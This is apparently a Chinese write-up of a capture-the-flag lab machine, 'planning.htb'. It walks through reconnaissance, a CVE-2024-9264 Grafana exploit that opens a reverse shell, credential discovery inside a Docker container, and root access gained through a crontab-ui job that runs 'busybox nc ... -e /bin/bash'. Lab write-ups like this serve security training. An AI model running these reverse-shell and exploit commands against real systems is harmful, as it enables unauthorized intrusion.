一、初始侦察与立足点建立

1.1 端口扫描与服务识别
对目标主机 10.10.11.68 进行全端口扫描，以识别开放的服务。

sudo nmap 10.10.11.68 -p- --min-rate=5000 -A

图1: Nmap 扫描结果显示开放 22 (SSH) 和 80 (HTTP) 端口，重点关注 80 端口的 Web 服务。

1.2 Web 服务探索与目录爆破
访问 80 端口的 Web 服务，发现其重定向至 http://planning.htb/。将该域名添加到本地 DNS 解析文件 (/etc/hosts)后进行访问。

图2: 访问 http://planning.htb/，显示一个 PHP 开发的教育课程网站。

使用 feroxbuster 对网站进行目录爆破，寻找敏感文件或路径。

feroxbuster -u http://planning.htb -x php

图3: Feroxbuster 目录爆破结果，发现一个 LICENSE 文件。

查看 LICENSE 文件内容，并通过搜索引擎查询，判断该网站是基于这个公开的 Web 模板开发的，接近是一个静态网站，很难有从这里利用的路径。

图4: LICENSE 文件内容，指向一个通用 Web 模板。

1.3 子域名爆破与 Grafana 发现
尝试进行子域名爆破。但没有任何发现。

ffuf -u 'http://planning.htb' -H 'host:FUZZ.planning.htb' -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-20000.txt -t 100 -fs 178

图5: 使用小字典进行子域名爆破，无有效发现。

靶机给了我们初始的凭证，已经明示了有 Web 站点了。暂时没有其他思路，换用更大的字典接着进行子域名爆破，成功发现新的子域名。

ffuf -u 'http://planning.htb' -H 'host:FUZZ.planning.htb' -w /usr/share/wordlists/seclists/Discovery/DNS/combined_subdomains.txt -t 100 -fs 178

图6: 使用大字典进行子域名爆破，成功发现 grafana.planning.htb。

将 grafana.planning.htb 添加到本地 DNS 解析后访问，发现是一个 Grafana 服务界面。Grafana 是一个开源的数据可视化和监控平台。

图7: 访问 grafana.planning.htb，显示 Grafana 登录界面。

1.4 Grafana 登录与漏洞利用 (CVE-2024-9264)
使用靶机提供的初始凭证 admin / 0D5oT70Fq13EvB5r 尝试登录 Grafana 系统。

图8: 使用初始凭证 admin / 0D5oT70Fq13EvB5r 成功登录 Grafana 系统。

登录后，没有发现有版本信息，搜索 Grafana 相关的已知漏洞，发现一个近期披露的漏洞 CVE-2024-9264。无论如何先尝试利用。

图9: 网络搜索到的 Grafana 相关漏洞信息 (CVE-2024-9264)。

利用找到的 PoC 脚本，设置反向 Shell 连接至攻击机 10.10.14.17 的 53 端口。

python3 poc.py --url http://grafana.planning.htb/ --username admin --password 0D5oT70Fq13EvB5r --reverse-ip 10.10.14.17 --reverse-port 53

图10: 成功利用 CVE-2024-9264 获得反向 Shell，当前用户为 root。

1.5 Docker 容器内信息收集
检查当前 Shell 环境，发现存在 /.dockerenv 文件，表明当前 Shell 位于 Docker 容器内部。

ls -alh /.dockerenv

图11: /.dockerenv 文件存在，确认当前环境为 Docker 容器。

在容器内部署并运行 linpeas.sh 脚本进行信息收集，寻找敏感信息或逃逸路径。

图12: 在 Docker 容器内上传并运行 linpeas.sh。

linpeas.sh 的输出结果中，在环境变量部分发现了泄露的凭证：enzo / RioTecRANDEntANT!。

图13: Linpeas.sh 发现环境变量中泄露的用户 enzo 的凭证。

二、主机渗透与横向移动

2.1 SSH 登录与主机信息枚举
利用在 Docker 容器内发现的凭证 enzo / RioTecRANDEntANT! 尝试通过 SSH 登录宿主机 (10.10.11.68)。

图14: 使用 enzo 的凭证成功通过 SSH 登录宿主机。

登录后，进行基本的手动信息枚举。查看网络连接，发现宿主机本地开放了 3000 和 8000 端口。其中 3000 端口为之前访问的 Grafana 服务。

图15: 主机本地端口监听情况，3000 和 8000 端口引起注意。

2.2 本地端口转发与服务识别
为了访问宿主机本地的 8000 端口服务，使用 SSH 本地端口转发功能。

ssh -N -L 8000:127.0.0.1:8000 enzo@10.10.11.68

图16: 访问本地转发的 8000 端口，服务需要认证。尝试之前获取的凭证均失败。

为了确定 8000 端口运行的服务及潜在的提权向量，再次在宿主机上上传并运行 linpeas.sh 进行更全面的信息收集。

图17: 在宿主机上运行 linpeas.sh 进行信息收集。

三、权限提升：Crontab-UI

3.1 Crontab-UI 凭证获取
仔细审查 linpeas.sh 在宿主机上的输出，发现一个名为 crontab-ui 的应用进程，这个程序很陌生，并不是 Linux 上内置或者常见的，可能与 8000 端口的服务相关。

图18: Linpeas.sh 输出中发现 crontab-ui 进程。

同时，在 /opt 目录下发现一个名为 crontabs 的目录，其中包含 crontab.db 文件，推测这可能是 crontab-ui 的数据库或配置文件。

图19: /opt/crontabs/crontab.db 文件路径被发现。

查看 crontab.db 文件内容。

cat /opt/crontabs/crontab.db

图20: crontab.db 文件内容中包含参数 -P P4ssw0rdS0pRi0T3c，这极有可能是 crontab-ui 的登录密码。

3.2 Crontab-UI 登录与利用
尝试使用用户名 root 和从 crontab.db 中获取的密码 P4ssw0rdS0pRi0T3c 登录本地转发的 8000 端口上的 Web 服务。

图21: 使用 root / P4ssw0rdS0pRi0T3c 成功登录 Crontab-UI 界面，这是一个计划任务管理平台。

Crontab-UI 允许以 root 权限管理和执行计划任务。我们可以利用此功能创建一个反弹 Shell 的任务。

图22: 在 Crontab-UI 中创建一个新的计划任务，设置为每分钟执行，命令为 busybox nc 10.10.14.17 53 -e /bin/bash，保存并手动触发执行。

3.3 获取 Root Shell
在攻击机上监听 53 端口，等待 Crontab-UI 执行计划任务。

图23: 成功接收到 Crontab-UI 触发的反弹 Shell，获得宿主机 root 权限。

至此，已成功获取目标主机的最高权限。

---